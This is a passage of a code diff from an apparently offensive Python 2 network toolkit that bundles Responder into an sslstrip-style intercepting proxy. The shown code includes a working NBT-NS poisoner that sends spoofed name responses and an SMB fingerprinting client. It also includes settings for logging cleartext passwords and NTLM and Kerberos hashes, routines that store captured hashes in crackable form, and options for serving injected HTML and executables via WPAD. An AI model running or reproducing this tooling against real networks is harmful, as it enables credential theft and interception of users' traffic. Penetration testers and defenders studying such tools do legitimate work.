if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
return True
else:
return False
# NBT_NS Server class.
class NBTNSServer(BaseRequestHandler):
def handle(self):
data, socket = self.request
Name = Decode_Name(data[13:45])
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x01\x10":
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
else:
Finger = None
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: NBT-NS] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = NBT_Ans()
Buffer.calculate(data)
socket.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("{} [NBT-NS] Poisoned answer for name {} (service: {})" .format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version : {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version : {}".format(Finger[1]))

View file

@ -17,7 +17,13 @@
#
import sys
import logging
import inspect
import traceback
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [ProxyPlugins] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ProxyPlugins", formatter)
class ProxyPlugins:
'''
@ -37,39 +43,49 @@ class ProxyPlugins:
vars still have to be set back in the function. This only happens
in handleResponse, but is still annoying.
'''
_instance = None
@staticmethod
def getInstance():
if ProxyPlugins._instance == None:
ProxyPlugins._instance = ProxyPlugins()
mthdDict = {"connectionMade" : "request",
"handleStatus" : "responsestatus",
"handleResponse" : "response",
"handleHeader" : "responseheaders",
"handleEndHeaders": "responseheaders"}
return ProxyPlugins._instance
plugin_mthds = {}
plugin_list = []
all_plugins = []
def setPlugins(self,plugins):
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def set_plugins(self, plugins):
'''Set the plugins in use'''
self.plist = []
#build a lookup list
#need to clean up in future
self.pmthds = {}
for p in plugins:
self.addPlugin(p)
self.add_plugin(p)
def addPlugin(self,p):
log.debug("Loaded {} plugin/s".format(len(plugins)))
def add_plugin(self,p):
'''Load a plugin'''
self.plist.append(p)
for mthd in p.implements:
self.plugin_list.append(p)
log.debug("Adding {} plugin".format(p.name))
for mthd,pmthd in self.mthdDict.iteritems():
try:
self.pmthds[mthd].append(getattr(p,mthd))
self.plugin_mthds[mthd].append(getattr(p,pmthd))
except KeyError:
self.pmthds[mthd] = [getattr(p,mthd)]
self.plugin_mthds[mthd] = [getattr(p,pmthd)]
def removePlugin(self,p):
def remove_plugin(self,p):
'''Unload a plugin'''
self.plist.remove(p)
for mthd in p.implements:
self.pmthds[mthd].remove(p)
self.plugin_list.remove(p)
log.debug("Removing {} plugin".format(p.name))
for mthd,pmthd in self.mthdDict.iteritems():
try:
self.plugin_mthds[mthd].remove(getattr(p,pmthd))
except KeyError:
pass #nothing to remove
def hook(self):
'''Magic to hook various function calls in sslstrip'''
@ -84,16 +100,25 @@ class ProxyPlugins:
args[key] = values[key]
#prevent self conflict
args['request'] = args['self']
if (fname == "handleResponse") or (fname == "handleHeader") or (fname == "handleEndHeaders"):
args['request'] = args['self']
args['response'] = args['self'].client
else:
args['request'] = args['self']
del args['self']
log.debug("hooking {}()".format(fname))
#calls any plugin that has this hook
try:
for f in self.pmthds[fname]:
a = f(**args)
if a != None: args = a
except KeyError:
pass
if self.plugin_mthds:
for f in self.plugin_mthds[fname]:
a = f(**args)
if a != None: args = a
except Exception as e:
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
log.error("Exception occurred in hooked function")
traceback.print_exc()
#pass our changes to the locals back down
return args

View file

@ -1,106 +0,0 @@
"""Public Suffix List module for Python.
"""
import codecs
import os.path
class PublicSuffixList(object):
def __init__(self, input_file=None):
"""Reads and parses public suffix list.
input_file is a file object or another iterable that returns
lines of a public suffix list file. If input_file is None, an
UTF-8 encoded file named "publicsuffix.txt" in the same
directory as this Python module is used.
The file format is described at http://publicsuffix.org/list/
"""
if input_file is None:
input_path = os.path.join(os.path.dirname(__file__), 'publicsuffix.txt')
input_file = codecs.open(input_path, "r", "utf8")
root = self._build_structure(input_file)
self.root = self._simplify(root)
def _find_node(self, parent, parts):
if not parts:
return parent
if len(parent) == 1:
parent.append({})
assert len(parent) == 2
negate, children = parent
child = parts.pop()
child_node = children.get(child, None)
if not child_node:
children[child] = child_node = [0]
return self._find_node(child_node, parts)
def _add_rule(self, root, rule):
if rule.startswith('!'):
negate = 1
rule = rule[1:]
else:
negate = 0
parts = rule.split('.')
self._find_node(root, parts)[0] = negate
def _simplify(self, node):
if len(node) == 1:
return node[0]
return (node[0], dict((k, self._simplify(v)) for (k, v) in node[1].items()))
def _build_structure(self, fp):
root = [0]
for line in fp:
line = line.strip()
if line.startswith('//') or not line:
continue
self._add_rule(root, line.split()[0].lstrip('.'))
return root
def _lookup_node(self, matches, depth, parent, parts):
if parent in (0, 1):
negate = parent
children = None
else:
negate, children = parent
matches[-depth] = negate
if depth < len(parts) and children:
for name in ('*', parts[-depth]):
child = children.get(name, None)
if child is not None:
self._lookup_node(matches, depth+1, child, parts)
def get_public_suffix(self, domain):
"""get_public_suffix("www.example.com") -> "example.com"
Calling this function with a DNS name will return the
public suffix for that name.
Note that for internationalized domains the list at
http://publicsuffix.org uses decoded names, so it is
up to the caller to decode any Punycode-encoded names.
"""
parts = domain.lower().lstrip('.').split('.')
hits = [None] * len(parts)
self._lookup_node(hits, 1, self.root, parts)
for i, what in enumerate(hits):
if what is not None and what == 0:
return '.'.join(parts[i:])

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,68 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import sys
import socket
import struct
import string
import logging
from utils import *
from odict import OrderedDict
from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def RunSmbFinger(host):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(0.7)
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(data = SMBNegoFingerData())
n.calculate()
Packet = str(h)+str(n)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
Body = SMBSessionFingerData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
return OsNameClientVersion(data)
except:
settings.Config.AnalyzeLogger.warning("Fingerprint failed for host: {}".format(host))
return None

117
core/responder/odict.py Normal file
View file

@ -0,0 +1,117 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(self.items(), other.items()))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other

1277
core/responder/packets.py Normal file

File diff suppressed because it is too large Load diff

181
core/responder/settings.py Normal file
View file

@ -0,0 +1,181 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import socket
import utils
import logging
from core.logger import logger
from core.configwatcher import ConfigWatcher
__version__ = 'Responder 2.2'
class Settings(ConfigWatcher):
def __init__(self):
self.ResponderPATH = os.path.dirname(__file__)
self.Bind_To = '0.0.0.0'
def __str__(self):
ret = 'Settings class:\n'
for attr in dir(self):
value = str(getattr(self, attr)).strip()
ret += " Settings.%s = %s\n" % (attr, value)
return ret
def toBool(self, str):
return True if str.upper() == 'ON' else False
def ExpandIPRanges(self):
def expand_ranges(lst):
ret = []
for l in lst:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
return ret
self.RespondTo = expand_ranges(self.RespondTo)
self.DontRespondTo = expand_ranges(self.DontRespondTo)
def populate(self, options):
# Servers
self.SSL_On_Off = self.toBool(self.config['Responder']['HTTPS'])
self.SQL_On_Off = self.toBool(self.config['Responder']['SQL'])
self.FTP_On_Off = self.toBool(self.config['Responder']['FTP'])
self.POP_On_Off = self.toBool(self.config['Responder']['POP'])
self.IMAP_On_Off = self.toBool(self.config['Responder']['IMAP'])
self.SMTP_On_Off = self.toBool(self.config['Responder']['SMTP'])
self.LDAP_On_Off = self.toBool(self.config['Responder']['LDAP'])
self.Krb_On_Off = self.toBool(self.config['Responder']['Kerberos'])
# Db File
self.DatabaseFile = './logs/responder/Responder.db'
# Log Files
self.LogDir = './logs/responder'
if not os.path.exists(self.LogDir):
os.mkdir(self.LogDir)
self.SessionLogFile = os.path.join(self.LogDir, 'Responder-Session.log')
self.PoisonersLogFile = os.path.join(self.LogDir, 'Poisoners-Session.log')
self.AnalyzeLogFile = os.path.join(self.LogDir, 'Analyzer-Session.log')
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt')
self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt')
self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt')
self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt')
self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt')
self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt')
self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt')
self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt')
# HTTP Options
self.Serve_Exe = self.toBool(self.config['Responder']['HTTP Server']['Serve-Exe'])
self.Serve_Always = self.toBool(self.config['Responder']['HTTP Server']['Serve-Always'])
self.Serve_Html = self.toBool(self.config['Responder']['HTTP Server']['Serve-Html'])
self.Html_Filename = self.config['Responder']['HTTP Server']['HtmlFilename']
self.HtmlToInject = self.config['Responder']['HTTP Server']['HTMLToInject']
self.Exe_Filename = self.config['Responder']['HTTP Server']['ExeFilename']
self.Exe_DlName = self.config['Responder']['HTTP Server']['ExeDownloadName']
self.WPAD_Script = self.config['Responder']['HTTP Server']['WPADScript']
if not os.path.exists(self.Html_Filename):
print "Warning: %s: file not found" % self.Html_Filename
if not os.path.exists(self.Exe_Filename):
print "Warning: %s: file not found" % self.Exe_Filename
# SSL Options
self.SSLKey = self.config['Responder']['HTTPS Server']['SSLKey']
self.SSLCert = self.config['Responder']['HTTPS Server']['SSLCert']
# Respond to hosts
self.RespondTo = filter(None, [x.upper().strip() for x in self.config['Responder']['RespondTo'].strip().split(',')])
self.RespondToName = filter(None, [x.upper().strip() for x in self.config['Responder']['RespondToName'].strip().split(',')])
self.DontRespondTo = filter(None, [x.upper().strip() for x in self.config['Responder']['DontRespondTo'].strip().split(',')])
self.DontRespondToName = filter(None, [x.upper().strip() for x in self.config['Responder']['DontRespondToName'].strip().split(',')])
# CLI options
self.Interface = options.interface
self.Force_WPAD_Auth = options.forcewpadauth
self.LM_On_Off = options.lm
self.WPAD_On_Off = options.wpad
self.Wredirect = options.wredir
self.NBTNSDomain = options.nbtns
self.Basic = options.basic
self.Finger_On_Off = options.finger
self.AnalyzeMode = options.analyze
#self.Upstream_Proxy = options.Upstream_Proxy
self.Verbose = True
if options.log_level == 'debug':
self.Verbose = True
self.Bind_To = utils.FindLocalIP(self.Interface)
self.IP_aton = socket.inet_aton(self.Bind_To)
self.Os_version = sys.platform
# Set up Challenge
self.NumChal = self.config['Responder']['Challenge']
if len(self.NumChal) is not 16:
print "The challenge must be exactly 16 chars long.\nExample: 1122334455667788"
sys.exit(-1)
self.Challenge = ""
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
# Set up logging
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
self.ResponderLogger = logger().setup_logger("Responder", formatter, self.SessionLogFile)
#logging.warning('Responder Started: {}'.format(self.CommandLine))
#logging.warning('Responder Config: {}'.format(self))
self.PoisonersLogger = logger().setup_logger("Poison log", formatter, self.PoisonersLogFile)
self.AnalyzeLogger = logger().setup_logger("Analyze Log", formatter, self.AnalyzeLogFile)
Config = Settings()

247
core/responder/utils.py Normal file
View file

@ -0,0 +1,247 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import re
import logging
import socket
import time
import settings
import sqlite3
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
if len(settings.Config.RespondTo) and ClientIp not in settings.Config.RespondTo:
return False
if ClientIp in settings.Config.RespondTo or settings.Config.RespondTo == []:
if ClientIp not in settings.Config.DontRespondTo:
return True
return False
def RespondToThisName(Name):
if len(settings.Config.RespondToName) and Name.upper() not in settings.Config.RespondToName:
return False
if Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
return True
return False
def RespondToThisHost(ClientIp, Name):
return (RespondToThisIP(ClientIp) and RespondToThisName(Name))
def IsOsX():
return True if settings.Config.Os_version == "darwin" else False
def OsInterfaceIsSupported():
if settings.Config.Interface != "Not set":
return False if IsOsX() else True
else:
return False
def FindLocalIP(Iface):
if Iface == 'ALL':
return '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, 25, Iface+'\0')
s.connect(("127.0.0.1",9))#RFC 863
ret = s.getsockname()[0]
s.close()
return ret
except socket.error:
sys.exit(-1)
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
settings.Config.ResponderLogger.info("[*] Captured Hash: %s" % data)
if os.path.isfile(outfile) == False:
with open(outfile,"w") as outf:
outf.write(data)
outf.write("\n")
outf.close()
else:
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
filestr.close()
return False
if re.search(re.escape("$"), user):
filestr.close()
return False
with open(outfile,"a") as outf2:
outf2.write(data)
outf2.write("\n")
outf2.close()
def SaveToDb(result):
# Creating the DB if it doesn't exist
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('CREATE TABLE responder (timestamp varchar(32), module varchar(16), type varchar(16), client varchar(32), hostname varchar(32), user varchar(32), cleartext varchar(128), hash varchar(512), fullhash varchar(512))')
cursor.commit()
cursor.close()
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
if len(result['user']) < 2:
return
if len(result['cleartext']):
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
timestamp = time.strftime("%d-%m-%Y %H:%M:%S")
logfile = os.path.join('./logs/responder', fname)
cursor = sqlite3.connect(settings.Config.DatabaseFile)
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['user']))
(count,) = res.fetchone()
if count == 0:
# Write JtR-style hash string to file
with open(logfile,"a") as outf:
outf.write(result['fullhash'])
outf.write("\n")
outf.close()
# Update database
cursor.execute("INSERT INTO responder VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)", (timestamp, result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
cursor.close()
# Print output
if count == 0 or settings.Config.Verbose:
if len(result['client']):
settings.Config.ResponderLogger.info("[%s] %s Client : %s" % (result['module'], result['type'], result['client']))
if len(result['hostname']):
settings.Config.ResponderLogger.info("[%s] %s Hostname : %s" % (result['module'], result['type'], result['hostname']))
if len(result['user']):
settings.Config.ResponderLogger.info("[%s] %s Username : %s" % (result['module'], result['type'], result['user']))
# By order of priority, print cleartext, fullhash, or hash
if len(result['cleartext']):
settings.Config.ResponderLogger.info("[%s] %s Password : %s" % (result['module'], result['type'], result['cleartext']))
elif len(result['fullhash']):
settings.Config.ResponderLogger.info("[%s] %s Hash : %s" % (result['module'], result['type'], result['fullhash']))
elif len(result['hash']):
settings.Config.ResponderLogger.info("[%s] %s Hash : %s" % (result['module'], result['type'], result['hash']))
else:
settings.Config.PoisonersLogger.warning('Skipping previously captured hash for %s' % result['user'])
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)][1] =="\x1c":
return False
elif data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
return True
elif data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
return True
else:
return False
def Decode_Name(nbname):
#From http://code.google.com/p/dpkt/ with author's permission.
try:
from string import printable
if len(nbname) != 32:
return nbname
l = []
for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf)))
return filter(lambda x: x in printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
except:
return "Illegal NetBIOS name"
def NBT_NS_Role(data):
Role = {
"\x41\x41\x00":"Workstation/Redirector",
"\x42\x4c\x00":"Domain Master Browser",
"\x42\x4d\x00":"Domain Controller",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election",
"\x43\x41\x00":"File Server",
"\x41\x42\x00":"Browser",
}
return Role[data] if data in Role else "Service not known"
# Useful for debugging
def hexdump(src, l=0x16):
res = []
sep = '.'
src = str(src)
for i in range(0, len(src), l):
s = src[i:i+l]
hexa = ''
for h in range(0,len(s)):
if h == l/2:
hexa += ' '
h = s[h]
if not isinstance(h, int):
h = ord(h)
h = hex(h).replace('0x','')
if len(h) == 1:
h = '0'+h
hexa += h + ' '
hexa = hexa.strip(' ')
text = ''
for c in s:
if not isinstance(c, int):
c = ord(c)
if 0x20 <= c < 0x7F:
text += chr(c)
else:
text += sep
res.append(('%08X: %-'+str(l*(2+1)+1)+'s |%s|') % (i, hexa, text))
return '\n'.join(res)

View file

@ -1,13 +0,0 @@
Originally, sergio-proxy was a standalone implementation of a
transparent proxy using the Twisted networking framework
for Python. However, sslstrip uses almost *exactly* the
same interception method, so I decided to use sslstrip's
more mature libraries and try to provide a simple plugin
interface to grab the data.
The only file that has been modified from sslstrip is the
ServerConnection.py file, from which we can hook at certain
important points during the intercept.
Copyright 2011, Ben Schmidt
Released under the GPLv3

224
core/servers/Browser.py Normal file
View file

@ -0,0 +1,224 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import threading
import core.responder.settings as settings
from core.responder.packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPServer(('', 138), Browser1)
t = threading.Thread(name='Browser', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting Browser server on port 138: {}".format(e)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def WorkstationFingerPrint(data):
Role = {
"\x04\x00" :"Windows 95",
"\x04\x10" :"Windows 98",
"\x04\x90" :"Windows ME",
"\x05\x00" :"Windows 2000",
"\x05\x00" :"Windows XP",
"\x05\x02" :"Windows 2003",
"\x06\x00" :"Windows Vista/Server 2008",
"\x06\x01" :"Windows 7/Server 2008R2",
}
return Role[data] if data in Role else "Unknown"
def RequestType(data):
Type = {
"\x01": 'Host Announcement',
"\x02": 'Request Announcement',
"\x08": 'Browser Election',
"\x09": 'Get Backup List Request',
"\x0a": 'Get Backup List Response',
"\x0b": 'Become Backup Browser',
"\x0c": 'Domain/Workgroup Announcement',
"\x0d": 'Master Announcement',
"\x0e": 'Reset Browser State Announcement',
"\x0f": 'Local Master Announcement',
}
return Type[data] if data in Type else "Unknown"
def PrintServerName(data, entries):
if entries > 0:
entrieslen = 26*entries
chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
l = []
for x in ServerName:
FP = WorkstationFingerPrint(x[16:18])
Name = x[:16].replace('\x00', '')
if FP:
l.append(Name + ' (%s)' % FP)
else:
l.append(Name)
return l
return None
def ParsePacket(Payload):
PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
if StatusCode == "\x00\x00":
EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
else:
return None
def RAPThisDomain(Client,Domain):
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
if PDC is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
if SQL is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
if WKST is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
def RapFinger(Host, Domain, Type):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host,445))
s.settimeout(0.3)
Header = SMBHeader(cmd="\x72",mid="\x01\x00")
Body = SMBNegoData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Session Setup AndX Request, Anonymous.
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",mid="\x02\x00")
Body = SMBSessionData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Tree Connect IPC$.
if data[8:10] == "\x73\x00":
Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Rap ServerEnum.
if data[8:10] == "\x75\x00":
Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(64736)
# Rap ServerEnum, Get answer and return what we're looking for.
if data[8:10] == "\x25\x00":
s.close()
return ParsePacket(data)
except:
pass
def BecomeBackup(data,Client):
try:
DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:]
ReqType = RequestType(BrowserPacket[0])
if ReqType == "Become Backup Browser":
ServerName = BrowserPacket[1:]
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role = NBT_NS_Role(data[45:48])
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
print RAPThisDomain(Client, Domain)
except:
pass
def ParseDatagramNBTNames(data,Client):
try:
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
